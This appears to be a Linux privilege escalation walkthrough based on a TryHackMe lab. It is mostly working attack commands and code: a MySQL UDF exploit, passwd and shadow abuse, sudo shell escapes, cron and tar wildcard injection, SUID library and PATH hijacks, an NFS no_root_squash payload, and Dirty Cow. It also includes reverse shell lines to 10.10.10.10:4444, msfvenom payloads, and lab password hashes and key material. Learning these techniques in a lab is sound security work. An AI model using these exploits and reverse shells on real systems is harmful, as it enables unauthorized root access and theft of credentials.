Linux Privilege Escalation
Service Exploits
The MySQL service is running as root and the "root" user for the service does not have a password assigned. We can use a popular exploit that takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.
Compile the exploit code
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lcConnect Mysql user as root without password:
mysql -u root
Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit.
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';Copy /bin/bash to /tmp/rootbash and set SUID permission.
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');Exit from mysql shell and type this /tmp/rootbash -p.
Weak File Permissions
Reable /etc/shodow
The /etc/shadow file contains user password hashes and is usually readable only by the root user.
user@debian:~$ ls -al /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
user@debian:~$ cat /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
sync:*:17298:0:99999:7:::
games:*:17298:0:99999:7:::
man:*:17298:0:99999:7:::
lp:*:17298:0:99999:7:::
mail:*:17298:0:99999:7:::
news:*:17298:0:99999:7:::
uucp:*:17298:0:99999:7:::
proxy:*:17298:0:99999:7:::
www-data:*:17298:0:99999:7:::
backup:*:17298:0:99999:7:::
list:*:17298:0:99999:7:::
irc:*:17298:0:99999:7:::
gnats:*:17298:0:99999:7:::
nobody:*:17298:0:99999:7:::
libuuid:!:17298:0:99999:7:::
Debian-exim:!:17298:0:99999:7:::
sshd:*:17298:0:99999:7:::
user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:17298:0:99999:7:::
statd:*:17299:0:99999:7:::
mysql:!:18133:0:99999:7:::
user@debian:~$
Crack the hashes with john
Writable /etc/passwd
The /etc/passwd file contains information about user accounts only writable by the root user.
user@debian:~$ ls -al /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25 2019 /etc/passwd
user@debian:~$ openssl passwd leet-enough
Warning: truncating password to 8 characters
Idz8.Wpwft5.c
user@debian:~$Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x").
user@debian:~$ ls -al /etc/passwd
-rw-r--rw- 1 root root 1009 Aug 25 2019 /etc/passwd
user@debian:~$ openssl passwd leet-enough
Warning: truncating password to 8 characters
Idz8.Wpwft5.c
user@debian:~$ vi /etc/passwd
user@debian:~$ su root
Password:
root@debian:/home/user#Sudo
Shell Escape Sequences
Always should try sudo -l first.
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
(root) NOPASSWD: /usr/bin/find
(root) NOPASSWD: /usr/bin/nano
(root) NOPASSWD: /usr/bin/vim
(root) NOPASSWD: /usr/bin/man
(root) NOPASSWD: /usr/bin/awk
(root) NOPASSWD: /usr/bin/less
(root) NOPASSWD: /usr/bin/ftp
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/sbin/apache2
(root) NOPASSWD: /bin/more
user@debian:~$Go to GTFObin and file the programs name on the list, Eg.nmap
Type nmap in GTFObin.
user@debian:~$ sudo nmap --interactive
Starting Nmap V. 5.00 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !/bin/bash
root@debian:/home/user#Environment Variables
Cron Jobs
File Permissions
Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.
View the contents of the system-wide crontab: cat /etc/crontab
user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
user@debian:~$
You can also replace bash script to get reverse shell.
#!/bin/bash
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1PATH Environment Variable
cat /etc/crontab
You can see that there is no file path at overwrite.sh . PATH also has /home/user . If we can create a malicious file to that directory ,it will execute as root.
Wildcards
user@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
user@debian:~$tar command is being run with a wildcard (*). Note that tar has command line options that let you run other commands as part of a checkpoint feature.
Generate a reverse elf file with msfvenom .
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elfCreate two folder:
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elfWhen cronjob is run, tar will recognize them as command line options rather than filenames
Set up a netcat listener and wait for the cron job to run.
SUID / SGID
Known Exploits
Find all the SUID/SGID executables file.
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullbuser@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
---[snip]---
-rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid-so
-rwsr-sr-x 1 root staff 6883 May 14 2017 /usr/local/bin/suid-env
-rwsr-sr-x 1 root staff 6899 May 14 2017 /usr/local/bin/suid-env2
-rwsr-xr-x 1 root root 963691 May 13 2017 /usr/sbin/exim-4.84-3There is a file called /usr/sbin/exim-4.84-3 .To find exploit ExploitDB, Google, Github are good places to search.
user@debian:~$ ./pwned.sh
[ CVE-2016-1531 local root exploit
sh-4.1# id
uid=0(root) gid=1000(user) egid=0(root) groups=0(root)
sh-4.1#Shared Object Injection
The /usr/local/bin/suid-so SUID executable is vulnerable to shared object injection
First, execute the file /usr/local/bin/suid-so
Run strace on the file and search the output for open/access calls and for "no such file" errors:
strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
The executable tries to load the /home/user/.config/libcalc.so shared object within our home directory, but it cannot be found.
Create the .config directory for the libcalc.so file.
mkdir /home/user/.config.
libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("/bin/bash -p");
}
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.cExecute /usr/local/bin/suid-so again and now we will get root shell.
Environment Variables
The /usr/local/bin/suid-env executable can be exploited due to it inheriting the user's PATH environment variable and attempting to execute programs without specifying an absolute path.
Run the execute file /usr/local/bin/suid-env
user@debian:~$ /usr/local/bin/suid-env
Starting web server: apache2httpd (pid 1814) already running
.
user@debian:~$ It trying to runapache. we can check with strings command.
user@debian:~$ strings /usr/local/bin/suid-env
/lib64/ld-linux-x86-64.so.2
5q;Xq
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
service apache2 startThe service executable is being called to start webserver but it has not the full path. The Path should be like this/usr/bin/service .
Make a file name as service.c
user@debian:~$ cat /home/user/tools/suid/service.c
int main() {
setuid(0);
system("/bin/bash -p");
}Compile the code name with service
gcc -o service /home/user/tools/suid/service.cNow give the PATH to the currently directory or where the new service file is located.
user@debian:~$ cat /home/user/tools/suid/service.c
int main() {
setuid(0);
system("/bin/bash -p");
}
user@debian:~$ gcc -o service /home/user/tools/suid/service.c
user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env
root@debian:~# whoami
root
root@debian:~#Passwords & Keys
If a user accidentally types their password on the command line instead of into a password prompt, it may get recorded in a history file.
View the contents of all the hidden history files in the user's home directory:
cat ~/.history | less
Config Files
Config files often contain passwords in plaintext or other reversible formats.
user@debian:~$ cat myvpn.ovpn
---[snip]---
dev tun
tls-client
remote-cert-tls server
auth-user-pass /etc/openvpn/auth.txt
comp-lzo
verb 1
reneg-sec 0
user@debian:~$ cat /etc/openvpn/auth.txt
root
password123
user@debian:~$SSH Keys
Sometimes users make backups of important files but fail to secure them with the correct permissions.
user@debian:~$ ls -l /.ssh
total 4
-rw-r--r-- 1 root root 1679 Aug 25 2019 root_key
user@debian:~$ cat /.ssh/root_key
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3IIf6Wczcdm38MZ9+QADSYq9FfKfwj0mJaUteyJHWHZ3/GNm
gLTH3Fov2Ss8QuGfvvD4CQ1f4N0PqnaJ2WJrKSP8QyxJ7YtRTk0JoTSGWTeUpExl
-------[snip]-----
Whp/Mr5B5GDmMHBRtKaiLS8/NRAokiibsCmMzQegmfipo+35DNTW66DDq47RFgR4
LnM9yXzn+CbIJGeJk5XUFQuLSv0f6uiaWNi7t9UNyayRmwejI6phSw==
-----END RSA PRIVATE KEY-----
user@debian:~$
Copy to our machine and give the right permission and login with ssh
chmod 600 root_key
ssh -i root_key root@10.10.79.36NFS
Files created via NFS inherit the remote user's ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.
To check the NFS share configuration cat /etc/exports
user@debian:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
#/tmp *(rw,sync,insecure,no_subtree_check)the /tmp share has root squashing disabled. On your linux , switch to root if you are not root user.Create a mount point on your Kali box and mount the /tmp share and generate reverse shell with msfvenom .
mkdir /tmp/nfs
mount -o rw,vers=2 10.10.10.10:/tmp /tmp/nfs
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elfNow on the victim account, execute the file to gain a root shell. /tmp/shell.elf
Kernel Exploits
Kernel exploits can leave the system in an unstable state, which is why you should only run them as a last resort.
The popular Linux kernel exploit is Dirty Cow.
gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
./c0w
/usr/bin/passwd
Will be update more.
Reference : https://tryhackme.com/room/linuxprivesc
Last updated